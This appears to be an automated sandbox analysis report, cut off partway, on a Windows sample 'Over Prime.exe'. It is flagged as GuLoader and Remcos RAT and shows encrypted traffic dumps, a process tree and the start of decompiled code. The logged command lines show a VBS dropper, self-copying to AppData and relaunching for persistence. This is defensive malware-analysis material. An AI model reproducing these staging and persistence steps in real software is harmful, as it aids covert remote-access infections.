Ascii: R7,P.Zni}(9`*&+3srkl<:(cQvK\2yTB^1+1t3BVLH/S6Xp6rs!sNXvK24EA=R=I58Wr6hE~xnHK']('ww0'Pg!]Xx9H7Y]W.XVwf
2022-05-30 12:45:59 UTC	923	IN	Data Raw: f5 9e 88 84 7f 9b 7b 47 c4 c2 53 89 ba d2 97 30 5f ce a1 f7 91 ec cd e4 28 91 40 6d e4 cf 0c 06 9e ad 17 03 75 22 b6 79 d1 70 3d dc a5 0b 4c 59 e0 82 35 d3 c6 9f bd ec 7e 25 1b 3c d9 d6 3a 38 8c 8e fd 18 7a 94 4d 94 c3 3c 27 20 4c 01 c4 df 11 9c f7 fc 67 16 50 c9 89 87 d2 d3 33 bb a8 4b a3 5f f0 32 b8 79 54 06 dc a7 0c c1 42 d4 1a 1d d9 e8 9b 00 11 5e 31 a2 2b 31 83 83 74 1e 87 33 42 07 0c 23 51 56 e8 3e cc eb 4c 29 ac 7f 0d 21 77 05 d5 92 5a f3 50 6e c9 8c 75 3a 67 11 f1 7c 27 55 18 dc b1 a6 11 c8 66 53 db 9c 2f f3 7b 64 e3 14 ed 3f cd 04 33 9f ef bb 0f ea bf c3 57 0e 7f 0d ec 64 46 cb 3a 4f 8d 0a b6 0d c9 96 4e 5b 5e 0d d3 54 90 32 96 79 40 fc 99 7e 0c d9 55 f8 d5 0e fd 89 39 61 e3 12 89 52 96 ea 89 70 db 47 06 d9 e8 81 39 e5 0f ec 35 fb 53 6a 17 df 55 Data Ascii: {GS0_(@mu"yp=LY5~%<:8zM<' LgP3K_2yTB^1+1t3B#QV>L)!wZPnu:g\|'UfS/{d?3WdF:ON[^T2y@~U9aRpG95SjU
2022-05-30 12:45:59 UTC	925	IN	Data Raw: dd d2 05 1e 6e d6 c9 4d d5 f3 e4 13 ed 31 77 39 96 87 43 99 9f 12 1e 06 50 83 a2 e9 4c d1 69 e9 0b 15 ad 2b 82 ab 2d c6 9a 92 8e 1d 10 be 45 16 84 67 03 10 6f 3f d4 55 66 6e f5 6d 53 eb 53 57 bd 62 2a 91 af 52 78 59 32 c6 44 35 b2 e1 72 3d 9e c5 31 aa 1b d2 e6 ca a9 03 14 bd e2 a4 1c 0a 80 e3 3b 35 1c 7c da 99 ca 2d 30 b6 5d ed bd 8c c5 97 95 ea a8 8c cd 63 80 cd d3 70 b1 6b 71 99 08 8e 8f 1b 4c fb 90 fa c2 8b 71 c7 cd 02 ae 10 2f c3 d6 bd 97 0f db e1 ab 26 a7 52 e7 9a c1 c0 08 e9 9a f7 2c ad b8 4b fd 9f 38 00 5d 56 0c 39 b6 4d 99 62 1a 1f e8 26 37 7d 5f dc 2f 3d 87 86 b9 0d c2 b6 87 c0 2b 7e 16 da 40 1d 38 5e a7 45 c9 00 3c c9 dd 5c a1 4d 2f ac 32 5b 14 7a 82 16 8b 45 0a c7 99 0f 90 70 28 13 e8 56 6b 7c 62 53 8b bf d9 0a bc 71 a7 1c 50 c4 42 0a 0b 16 8c Data Ascii: nM1w9CPLi+-Ego?UfnmSSWb*RxY2D5r=1;5\|-0]cpkqLq/&R,K8]V9Mb&7}_/=+~@8^E<\M/2[zEp(Vk\|bSqPB
2022-05-30 12:45:59 UTC	926	IN	Data Raw: ff 59 ba 45 e6 bc 44 2c 93 3a 48 62 1a 21 61 ad 85 8a 15 ea 80 e9 a0 bf f5 de 28 19 28 7e 5c e2 7f 44 98 3d cd 7f 70 17 9a b6 02 0b 91 24 5e 6e 57 68 db b1 c7 dc dc e9 c4 08 76 1e ac 76 58 9a ce 1a a3 fe af 32 82 29 b9 28 68 a9 9b 30 11 db 6a c2 b9 12 47 d4 eb a7 ef 0e 87 c0 2e b7 78 cd 93 9a 79 38 2e ce 6b ad e9 28 30 14 dc 20 31 6c 83 17 81 da 9d 15 cd 41 9c 8e 2c 2a 56 0e 62 d6 24 da 23 36 ab 71 2b 2c af 91 31 3a 96 56 95 7c 2d 35 e9 e0 96 b6 cb e6 5c 6a c0 56 f0 21 6d 3c 59 7e 8c fa 5e e9 9e 55 6f a5 52 83 ef 04 85 c4 fe fe aa b9 30 76 7d 47 0d c0 65 33 b2 d3 22 cd 9f 84 c2 77 9d 30 e0 f5 69 0a 54 4d 97 64 30 8d 32 8d 0d ab 33 95 47 da 96 b0 d3 6b c5 07 71 1c b0 83 eb 43 3b 50 bf fb 37 58 1b 3a a8 6a d1 1e ba ee a0 4c 0b f7 dd 5f 26 44 72 9f fa 47 37 Data Ascii: YED,:Hb!a((~\D=p$^nWhvvX2)(h0jG.xy8.k(0 1lA,*Vb$#6q+,1:V\|-5\jV!m<Y~^UoR0v}Ge3"w0iTMd023GkqC;P7X:jL_&DrG7
2022-05-30 12:45:59 UTC	927	IN	Data Raw: 5b c1 dd 22 d3 6c 7d 7e 64 fa 4f 95 87 b6 cc be b8 dc 5f 1f 8e 26 39 54 1f 85 0a 4a 13 04 0f b1 76 fc 30 1a 41 8c e6 48 85 0b 9a 5d 45 81 b8 da 44 55 17 7f e5 7b 70 c7 c7 3d 50 c0 6b 1a a8 e8 67 ea fa 18 fc 63 ab 0c 6c 1a 30 40 78 d0 54 9f d7 e1 bb 16 28 66 cc 37 7f d1 5e b4 25 d8 44 19 dd 92 a6 12 c9 98 62 d9 ad c7 c2 57 55 31 25 d0 0e 79 35 63 ae 75 8a 65 db 3b f2 d7 3f 11 3c 73 55 10 fa 8b 7e cd 3b 7b 3c e1 a7 a4 6a 4c 3c 34 65 6c 02 96 49 a4 cc b6 4e c5 e9 1a c8 7f 3e a4 b9 ab 51 92 22 f5 62 1e da ef 40 7e 77 56 e9 54 b1 03 d5 c2 dc 11 cb b5 5a 19 ef a6 7e b6 c8 0f 82 64 f4 e0 52 a5 5d 0a ef 11 90 e1 a2 08 dc 75 f2 5b 67 68 25 7d 95 33 87 b5 7a 87 f1 54 10 f0 d8 2c 6f b9 50 a6 0d c5 ee 29 45 4c 3f 28 44 10 48 ca fb 9f 26 0b 5e 61 4c 07 86 6e 78 c0 a0 Data Ascii: ["l}~dO_&9TJv0AH]EDU{p=Pkgcl0@xT(f7^%DbWU1%y5cue;?<sU~;{<jL<4elIN>Q"b@~wVTZ~dR]u[gh%}3zT,oP)EL?(DH&^aLnx
2022-05-30 12:45:59 UTC	929	IN	Data Raw: 2e 16 88 02 e5 40 1d 60 88 88 3a df 87 1f 19 1b 10 fe 0f 69 71 0b de a0 05 45 7a d7 b2 02 3d 0d 8d 45 a2 e6 2d ef ff 94 03 ce 3e 81 39 98 44 e7 5f 89 5f 82 d6 6b 19 46 c2 04 b0 77 30 86 5c fe 55 5e 39 c8 c7 45 b5 21 f9 55 3c 57 2e 39 fc e9 82 c1 30 5c de 09 19 a7 52 e7 1a c1 c0 c4 e9 9a f7 96 9d 88 7a b3 51 03 32 f6 9b 1f 6d 55 81 3b c9 98 d3 88 da 4f b1 31 20 4b f0 c0 7b e9 c0 99 4b bb 0d 04 83 3e 17 43 e0 2c 93 b0 b8 37 ce d9 37 2e 92 52 b3 f3 62 b1 a5 95 b4 d5 e8 cf 8b 2b 39 ac c1 95 8e d6 dc 41 a9 c4 b3 e4 ac f3 70 b5 f5 fa be 5f ed 8f 05 ff fb 9b d7 12 d7 76 d9 4f ac b8 5d ce f5 6f 3a 35 97 6c 39 e8 18 f9 43 af 4a 8e e6 e6 31 a5 63 c9 b8 c2 e9 6a a4 26 d7 21 1e b1 07 97 ef a3 06 a9 b6 ee 23 d6 a8 36 a8 52 00 fb 1c 5d 3d 81 e2 8b a1 94 c1 08 2b cd f4 Data Ascii: .@`:iqEz=E->9D__kFw0\U^9E!U<W.90\RzQ2mU;O1 K{K>C,77.Rb+9Ap_vO]o:5l9CJ1cj&!#6R]=+
2022-05-30 12:45:59 UTC	930	IN	Data Raw: c2 8b d8 1e 5f 68 98 b3 e1 23 5d e2 0c 57 d4 e5 09 bd ff 5e b2 2d a0 d6 d7 a4 74 bf 67 8e 87 30 0c 10 64 a1 a7 1b 57 af a0 7e 88 08 ca 3d 3e 62 70 bd fb e4 78 37 54 ea bf 17 19 9f 8a 08 02 78 d5 30 2f 44 f2 f2 66 c3 43 dd c2 aa 47 e9 03 8d cd ae f2 57 9c e3 f2 6b a9 88 ee 9a 80 73 e5 65 00 76 b5 98 7c 89 31 f7 92 2b 67 8f a9 c9 bc c1 19 15 2e 22 84 d8 41 d3 46 bf 82 73 dc f6 4f af 35 46 b7 cc 2c e9 27 f8 5b db 64 65 6b a6 84 47 1b a3 fc 2c 0a 94 fd f0 8e 4a e7 98 82 4f 0d cc 12 ac 1e 2e 6c 6e b6 22 3a 4f a1 94 0c 50 f0 64 28 20 a8 9b ec 8e 81 03 59 cb 20 c6 cd 09 bf 77 53 b9 5e 15 00 30 5e f8 c7 34 9f 4c 79 aa 72 2e 40 6a a9 8b 6c b8 a4 c9 b3 0e a2 64 eb 73 e6 a0 bb 0a de 3a 3d b9 e6 f9 b5 4b 20 a7 85 c2 27 cd 2e 26 bb 4d 09 d3 83 30 1d fd 14 20 0a 96 74 Data Ascii: _h#]W^-tg0dW~=>bpx7Tx0/DfCGWksev\|1+g."AFsO5F,'[dekG,JO.ln":OPd( Y wS^0^4Lyr.@jlds:=K '.&M0 t
2022-05-30 12:45:59 UTC	931	IN	Data Raw: 66 73 03 26 78 f8 63 aa 37 f8 b8 d8 ee 73 95 16 68 87 06 61 43 cb a8 e4 c3 85 e8 a8 29 dd 7f a3 23 c1 a8 5e e3 8d e1 e6 47 7d 2d 4e d6 4f 03 5d 06 e5 22 3a 38 44 72 07 60 c5 b2 dd da 98 8b fb 0b 2c 41 ee 81 e2 05 6b 76 44 95 38 f7 c7 5b cb af 7b 8a f4 a6 6f c6 c0 68 de 1f 3e ce b6 f3 34 d0 48 43 35 a6 86 43 fd e8 d4 cc 4c db 14 fe 26 35 03 f2 03 68 fa d1 7c 64 e6 88 54 27 66 40 19 fe 8e af 61 0d c7 62 ce 88 03 6d cb 27 6e 12 18 2a 48 cd d9 94 20 2c f0 08 17 d5 c9 05 ec c0 12 59 f3 70 a1 0f 6b e9 b3 78 db 02 a8 0c 62 d9 ea 9a 97 70 e6 0e 90 62 48 39 4b e2 92 01 bf 6e f6 3b 9b 61 67 22 91 a1 fa cd a1 10 10 2e f4 33 8c 71 1a c8 58 49 cf 27 8e 87 b5 72 c7 98 fa 77 f0 ce 90 62 60 e4 d5 78 49 cf 5c cd 59 d7 bc 50 e5 97 dd ed 86 51 26 00 21 d8 91 05 dc f3 f0 bf Data Ascii: fs&xc7shaC)#^G}-NO]":8Dr`,AkvD8[{oh>4HC5CL&5h\|dT'f@abm'n*H ,YpkxbpbH9Kn;ag".3qXI'rwb`xI\YPQ&!
2022-05-30 12:45:59 UTC	932	IN	Data Raw: 02 e9 3b bb 44 a4 f8 02 ae 10 2f c1 d6 a5 97 0f db 6b 90 44 9b 42 da d9 fc b6 35 44 a7 2f 11 57 85 4b ed 62 88 18 06 a9 c8 01 79 15 78 18 d5 c4 3b 43 f0 df 80 6a ed c5 65 4e 76 f7 20 8a 78 38 c9 a5 db a6 91 5d f4 2a 76 1d 05 6c ed 99 11 38 70 25 e3 f0 e3 3b d8 2c 53 4d 40 17 dc c5 53 2a 47 1c e1 44 3c 25 a2 41 b6 7e 42 ab 0d 38 75 8d 72 ce 98 15 97 ff c3 a4 59 8d cd 9a e0 11 42 c9 2c 74 10 c4 56 7f 01 f2 bd da a0 7f 16 60 25 ee 62 32 56 08 27 dc 10 bc 01 e9 8b 6c b9 b5 2e 90 1e 67 25 fc 4b 46 f7 fe bd 66 54 94 05 32 03 0c 8a 32 eb 96 d7 cf c6 90 a1 95 68 5d 4f e6 29 8a f5 ac 34 b0 65 55 ca 1a 82 46 6e 52 e6 c4 36 46 78 43 20 b7 e3 28 a1 db 2b b5 0b a2 10 27 b8 69 4f e1 bc 23 7e d9 95 76 92 d0 6a cd 0f 61 74 92 6f b7 3b fc b4 ee e2 64 99 b5 65 33 0b e0 4e Data Ascii: ;D/kDB5D/WKbyx;CjeNv x8]vl8p%;,SM@SGD<%A~B8urYB,tV`%b2V'l.g%KFfT22h]O)4eUFnR6FxC (+'iO#~vjato;de3N
2022-05-30 12:45:59 UTC	934	IN	Data Raw: d8 ef c7 9e f6 6d b4 f1 9f 7e f4 0c 8f b8 a7 88 cc fc fc 95 1d c4 c7 be 3f d7 e6 b9 8b 42 a1 fc 54 33 90 87 f3 2a 28 da ff 0e 4d 15 4f 8a f7 ba 37 1b c7 c0 ae cd e9 0c d5 2c 5a b5 27 c9 bf 50 20 c5 2a f4 b9 88 6d ba 80 af 46 46 a9 d3 72 cb ed 37 62 c5 37 ac 73 c9 43 a3 6e 17 fa 39 9a ce 18 5a 14 8a 14 78 89 d7 a7 73 45 90 1c 42 68 c3 24 bd fb dd 5f 1f cf 62 56 81 92 09 99 ec 2e eb 85 ab e5 ff c2 63 21 06 4b ea a1 e7 53 cf 02 29 d9 96 c9 5e 4d 43 8f 4f a6 00 58 06 af 65 79 0b 9a ed df 2d 74 70 a6 e0 66 bf f5 dc fa 3f c9 ad 7a 15 ff 91 56 05 bc 09 d3 09 6b 7d 61 d4 99 77 2a 06 91 d4 48 5d b6 e0 d4 f5 57 70 02 a8 bd 4a 95 7d 30 7c 0d fb 18 ed 60 eb 40 78 48 be 5e 5e 79 22 fa b8 c0 b7 0e 94 84 21 0e b4 36 d5 49 a3 f5 a5 96 74 16 b4 ef 28 ae ac e2 b0 90 ae 9c Data Ascii: m~?BT3(MO7,Z'P mFFr7b7sCn9ZxsEBh$_bV.c!KS)^MCOXey-tpf?zVk}aw*H]WpJ}0\|`@xH^^y"!6It(
2022-05-30 12:45:59 UTC	935	IN	Data Raw: 36 e3 31 6a aa 21 67 ce 31 b6 68 ef 0e 1d 45 2b c0 0e 42 51 e5 f2 c4 9e 32 3a b5 09 5d 33 2e a8 6e 64 d6 7f 4f c8 78 e4 e6 d8 be 9c da 66 d3 be c4 eb 55 07 e0 4b 70 81 c5 68 8f ca f9 10 5f 96 6f 37 dd 5c a2 e6 90 57 ee 3f f0 19 65 44 27 61 97 65 85 c2 79 3e f1 d7 10 72 d8 aa 6f 04 50 25 0d 42 ee 20 45 44 3f 30 44 20 48 c0 fb 97 26 32 5e af 4c 77 81 4c 7e 3f a6 37 45 ba c1 ce ad aa 4b 1f 9b 89 ae 78 09 bf 82 40 04 e2 6f 61 ce 9d 9a 0c f7 55 bf b6 b0 47 ec f5 c4 46 b5 61 ec 85 26 fc 77 78 e3 7c c6 f8 da d6 42 58 2e e7 fd 81 97 82 5b 5a f3 e0 4a 14 17 91 cf db b6 fc 50 99 29 3d 49 24 72 21 d6 ad fd 0d 4a c5 cb 87 75 6a be 54 cc 08 04 0e 57 66 96 f8 c1 11 2c 76 fe 9d 1f a4 e2 39 57 ab 22 2f 80 33 d3 e4 cc 2a fd e1 bf c2 8a 43 c1 0b ba fd 92 96 cd f6 fd af 1c Data Ascii: 61j!g1hE+BQ2:]3.ndOxfUKph_o7\W?eD'aey>roP%B ED?0D H&2^LwL~?7EKx@oaUGFa&wx\|BX.[ZJP)=I$r!JujTWf,v9W"/3*C
2022-05-30 12:45:59 UTC	936	IN	Data Raw: 16 f3 e1 9a 92 36 b9 4a cc 5b 35 f2 90 77 b0 be 61 52 a6 22 b7 b5 eb 99 88 1d 3a 42 c1 36 8e 66 dd 54 a9 fb b3 1f ac d3 70 3d fa 4d b1 71 ec f7 04 c1 fa 98 d6 c1 d6 26 d8 ec ac 0e 5d 99 f5 d9 39 67 97 67 39 4b 18 67 43 93 4b cc e7 b3 30 9f 62 0d be 7d ef b2 a2 0b d1 41 18 db 01 bf ea e7 03 26 b2 0c 20 67 ab 6c 94 3c 9c 3e 20 2b 01 d2 df 45 ae af cf ef 25 b3 fa 7f 4c 02 6e 40 71 96 7e f1 6a 4f 07 63 4c ad 33 df 91 18 f7 5b e2 34 2b b8 de f3 36 7e 68 47 94 bb 07 1c b5 dd 28 31 05 82 ce 79 15 86 84 36 8c 48 dd c5 11 e9 47 dc 19 68 3d 35 aa 5a cb 52 55 17 b7 22 01 fe 2a 87 47 a5 6e ab e7 a7 9d 0d f2 ab 69 16 a6 28 c9 69 59 76 29 7b 02 93 39 93 a2 bc 86 ff d7 58 ff 6c 32 e0 31 9b 58 0a f7 c4 73 7a 35 ae 32 07 a9 34 64 dd 32 4a 6b f5 0d 33 46 0f c3 fa 40 38 e7 Data Ascii: 6J[5waR":B6fTp=Mq&]9gg9KgCK0b}A& gl<> +E%Ln@q~jOcL3[4+6~hG(1y6HGh=5ZRU"*Gni(iYv){9Xl21Xsz524d2Jk3F@8
2022-05-30 12:45:59 UTC	937	IN	Data Raw: 21 0c 5b dc 64 3d 6b ff 84 04 1b db fc 7b 0a f0 fe a9 8d e9 e5 c5 89 ec 07 04 27 60 cb fe 59 72 80 76 0c e7 a6 cd 08 13 f5 4e 2d 36 ab 7e ef 4d 81 ed 59 71 21 c4 cc 0c be 03 5d a8 51 07 0f 6b 51 48 cb d7 93 b9 75 5f 7e a9 4c e4 a5 3b 60 27 ae a7 b9 59 a8 74 e1 86 ed 75 b0 bf d5 58 35 11 ef be bc 90 28 54 8d ca e0 d5 19 e2 8c 6d 3e ec 84 49 1a a7 13 d4 0d 68 73 6e dc 92 04 5d 7b e2 b3 37 3c cd 8c df aa 24 29 79 fb de 06 fe 3b 63 3c 56 41 5b 5a 2b 5a f3 d3 f3 1b fd c0 d2 b2 69 32 5b 5f 8d 56 0f 3a f2 c4 c2 b5 a5 f9 11 3c 4a 2e c3 fd 22 83 6b 31 df de a7 19 b3 6d fb a5 e5 ff 24 d6 ae c8 10 92 fc 74 b1 5f dc 3f 5a 96 ac 61 25 8a 3c c2 99 d8 8e d1 44 ba 29 2b 4c fa c1 71 ea ca 94 41 c4 07 0d 89 25 1d 76 ea 1b 99 a1 b2 da c7 2a 3e de 9b 43 85 d0 04 d5 93 53 80 Data Ascii: ![d=k{'`YrvN-6~MYq!]QkQHu_~L;`'YtuX5(Tm>Ihsn]{7<$)y;c<VA[Z+Zi2[_V:<J."k1m$t_?Za%<D)+LqA%v*>CS
2022-05-30 12:45:59 UTC	939	IN	Data Raw: 58 7a 85 4c 60 0e 2b 24 19 85 2f c3 c8 7f 91 69 29 b8 0d 37 d0 da 00 16 c6 5d 5e 66 77 37 08 d0 ee 67 7f 18 05 6f 0b 67 df e8 9c 31 76 45 08 53 64 85 3f 7f 8b ab 38 4f 57 b6 02 d0 68 3a 2b ed a8 c4 c4 67 19 e0 27 63 3a 34 78 96 c1 ce 40 a7 2f f1 8f d4 7a 94 90 b8 7f 35 c6 58 6a 9e ec ca 70 42 c7 63 c5 70 df ec 58 bc 9f 6b e6 0d 5a c5 0b 77 d3 cb 0e 9a f8 46 b5 43 a7 a1 d0 d4 73 b0 60 97 80 37 0b 10 63 a0 a0 1c 50 a6 a7 61 8f 18 cd cc 38 9a 76 57 fd 04 7e 15 51 c0 ba 2c 1c d3 8f 7a 07 0b d0 a5 2a f1 f7 d2 8c e7 79 a9 f8 86 7d f1 09 8e c7 aa f8 c5 96 89 f9 6c a2 ba e5 46 8b 83 ee ea 0b cc be 3d 77 c5 39 a2 9a 75 6f a6 a1 08 b4 0e 11 ba 26 7e 8d f2 f2 9e 75 80 b1 e0 ef 07 4f 62 35 f2 b7 69 2c 9f 27 08 5d d0 62 39 6d e3 82 08 1d db fa 7b 0c f0 f8 a9 8b e9 e3 Data Ascii: XzL`+$/i)7]^fw7gog1vESd?8OWh:+g'c:4x@/z5XjpBcpXkZwFCs`7cPa8vW~Q,z*y}lF=w9uo&~uOb5i,']b9m{
2022-05-30 12:45:59 UTC	939	IN	Data Raw: d9 ca 43 15 74 5d eb 41 b3 72 d7 b1 de 0e c9 9c 58 3c ed 81 7c 55 c9 f2 83 8d f5 3b 53 92 5b 3b e9 4c 96 ae a4 73 da 30 f4 1a 61 2b 23 b4 93 e5 81 45 7c 69 f7 8c 16 54 de 8a 69 1b 56 ca 0b d5 e8 3b 43 b2 38 c0 43 36 4e ea fd b1 20 53 58 15 4a 71 80 32 7e 8e a6 45 46 22 c3 6f a1 0d 47 76 94 fd a1 89 06 5c 8d 9a 0a 8f 61 d5 c7 64 93 dd fe ba b4 02 95 ff d9 6d f1 8a 80 2b e9 8f 23 31 73 a5 e7 0a c2 00 dd e2 46 6d 2a b2 f9 c3 93 47 5f 1e f1 de 49 0b 14 85 cc c0 b5 ca 53 b5 2a 2e 4a 35 71 cd d5 4e fe de 4a 15 ca fd 74 02 bf 12 c2 58 0a b5 58 f3 99 00 ce 8b 23 bf f2 5c 12 c2 e9 59 5c c9 29 16 8b 14 da c1 c5 a2 f4 5f b6 e6 9d 6b f6 07 8d c1 a5 86 ce e0 fe 97 1f c4 c5 bb 3d dd e4 a0 89 4d a3 00 56 c1 92 97 f1 3c 2a f1 fd 37 4f 3a 4d 97 f5 d8 35 7b c5 a6 ac a9 eb Data Ascii: Ct]ArX<\|U;S[;Ls0a+#E\|iTiV;C8C6N SXJq2~EF"oGv\adm+#1sFmG_IS.J5qNJtXX#\Y\)_k=MV<*7O:M5{
2022-05-30 12:45:59 UTC	941	IN	Data Raw: a0 e0 ba 04 a5 fc 79 b7 fc d7 b7 e9 ea 13 02 60 fc 24 d0 ba d0 26 de 23 ab 71 5b 13 f3 3f 3f 7d 92 16 3c ae 1d bf 46 1e 4f 55 e3 16 34 0a 66 6b bd 50 ec 45 a0 33 d3 09 1a b6 03 96 eb a9 02 cf b2 1b 20 61 ab 84 ab c4 03 c6 1f b3 01 d2 5f e8 9c 7b fd 98 16 5d f9 66 48 04 6b d0 74 39 7b 18 6f b8 02 e0 49 08 36 bc 97 68 f1 2a e4 6a 2d 51 d8 03 30 8d 6e 9d 92 9b 01 37 b3 cc 2e 3b 03 86 c8 75 13 42 83 a6 8b 33 db 4c 19 5b 4f 0b 11 98 35 ca a2 b9 c3 6c 5e 72 bc 3b 0a c0 21 af 4c b8 65 7d ec 26 96 7e f8 ed 63 5e ac 4c c3 d6 54 ac 24 53 0f 8a 34 f4 af c8 8b 22 dd 70 f4 36 39 f4 3a 68 53 31 fc f4 78 92 3d 42 3a 36 a0 49 6d b5 3b 9b 62 03 04 e7 4f 33 ca 0b 48 53 ef 89 ce ce 38 0b bf 3e 57 c9 2b 4a 6b db d3 26 49 59 7e 75 e0 79 b8 66 dc a5 d5 16 c2 b4 53 04 e6 a5 77 Data Ascii: y`$&#q[??}<FOU4fkPE3 a_{]fHkt9{oI6h*j-Q0n7.;uB3L[O5l^r;!Le}&~c^LT$S4"p69:hS1x=B:6Im;bO3HS8>W+Jk&IY~uyfSw

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Over Prime.exePID: 8260, Parent PID: 8300

General

Target ID:	0
Start time:	14:44:37
Start date:	30/05/2022
Path:	C:\Users\user\Desktop\Over Prime.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Over Prime.exe"
Imagebase:	0x400000
File size:	339006 bytes
MD5 hash:	96F33F92C952C6D74C07974F375F81EE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: Over Prime.exePID: 396, Parent PID: 8260

General

Target ID:	3
Start time:	14:44:53
Start date:	30/05/2022
Path:	C:\Users\user\Desktop\Over Prime.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Over Prime.exe"
Imagebase:	0x400000
File size:	339006 bytes
MD5 hash:	96F33F92C952C6D74C07974F375F81EE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000003.00000000.827206659.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.977479110.00000000018CB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000003.00000002.976575832.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: wscript.exePID: 4848, Parent PID: 396

General

Target ID:	8
Start time:	14:45:08
Start date:	30/05/2022
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs"
Imagebase:	0x7ff6c4580000
File size:	147456 bytes
MD5 hash:	4D780D8F77047EE1C65F747D9F63A1FE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 1660, Parent PID: 4848

General

Target ID:	9
Start time:	14:45:10
Start date:	30/05/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Roaming\wqs.exe
Imagebase:	0xa90000
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 1704, Parent PID: 1660

General

Target ID:	10
Start time:	14:45:10
Start date:	30/05/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6879a0000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: wqs.exePID: 1752, Parent PID: 1660

General

Target ID:	11
Start time:	14:45:10
Start date:	30/05/2022
Path:	C:\Users\user\AppData\Roaming\wqs.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\wqs.exe
Imagebase:	0x400000
File size:	339006 bytes
MD5 hash:	96F33F92C952C6D74C07974F375F81EE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 12%, ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 9084, Parent PID: 1752

General

Target ID:	14
Start time:	14:45:13
Start date:	30/05/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 1752 -s 1028
Imagebase:	0xe40000
File size:	482640 bytes
MD5 hash:	40A149513D721F096DDF50C04DA2F01F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: wqs.exePID: 4356, Parent PID: 4760

General

Target ID:	20
Start time:	14:45:25
Start date:	30/05/2022
Path:	C:\Users\user\AppData\Roaming\wqs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\wqs.exe"
Imagebase:	0x400000
File size:	339006 bytes
MD5 hash:	96F33F92C952C6D74C07974F375F81EE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000014.00000002.1500240670.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: wqs.exePID: 2540, Parent PID: 4356

General

Target ID:	33
Start time:	14:45:41
Start date:	30/05/2022
Path:	C:\Users\user\AppData\Roaming\wqs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\wqs.exe"
Imagebase:	0x400000
File size:	339006 bytes
MD5 hash:	96F33F92C952C6D74C07974F375F81EE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000021.00000002.5715734688.00000000018B2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000021.00000000.1311290809.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: Over Prime.exePID: 8260, Parent PID: 8300COMMON

Execution Graph

Execution Coverage:	3%
Dynamic/Decrypted Code Coverage:	9.2%
Signature Coverage:	26.3%
Total number of Nodes:	947
Total number of Limit Nodes:	43

Executed Functions

Function 0040352D Relevance: 84.4, APIs: 33, Strings: 15, Instructions: 450
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			_entry_() {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				int _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed char _v42;
				int _v44;
				signed int _v48;
				intOrPtr _v278;
				signed short _v310;
				struct _OSVERSIONINFOW _v324;
				struct _SHFILEINFOW _v1016;
				intOrPtr* _t88;
				WCHAR* _t92;
				char* _t94;
				void _t97;
				void* _t116;
				WCHAR* _t118;
				signed int _t120;
				intOrPtr* _t124;
				void* _t138;
				void* _t144;
				void* _t149;
